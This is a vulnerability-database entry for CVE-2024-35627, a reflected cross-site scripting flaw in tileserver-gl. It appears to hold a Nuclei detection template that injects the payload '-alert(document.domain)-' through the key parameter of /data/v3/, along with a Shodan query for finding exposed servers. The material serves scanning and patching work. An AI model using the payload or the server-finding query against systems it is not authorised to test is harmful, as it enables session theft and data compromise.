CVE-2024-35627: TileServer API - Cross Site Scripting

2025-08-01 TileServer API PoC Public

Description

tileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key.

PoC

id: CVE-2024-35627

info:
  name: TileServer API - Cross Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    tileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key.
  impact: |
    Attackers can inject malicious scripts via the key parameter, potentially compromising user sessions or stealing sensitive information.
  remediation: |
    Update tileserver-gl to a version later than v4.4.10 that patches the XSS vulnerability.
  reference:
    - https://gist.github.com/SaleSlave/e23d49e7f8eb937784d15c2c2fc34fca
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-35627
    cwe-id: CWE-79
    epss-score: 0.00957
    epss-percentile: 0.59728
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1258058404
  tags: cve,cve2024,tileserver,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/data/v3/?key=%27-alert(document.domain)-%27"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "TileServer"
          - "'-alert(document.domain)-'"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022005486f7a1c7d3edacdeede7e12a796129e5de7330d1313ee1cde64e715754a50022065b3e0b620b8021ae75a2a98a576dfd071a4c505c15a128b7784a4e461705437:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities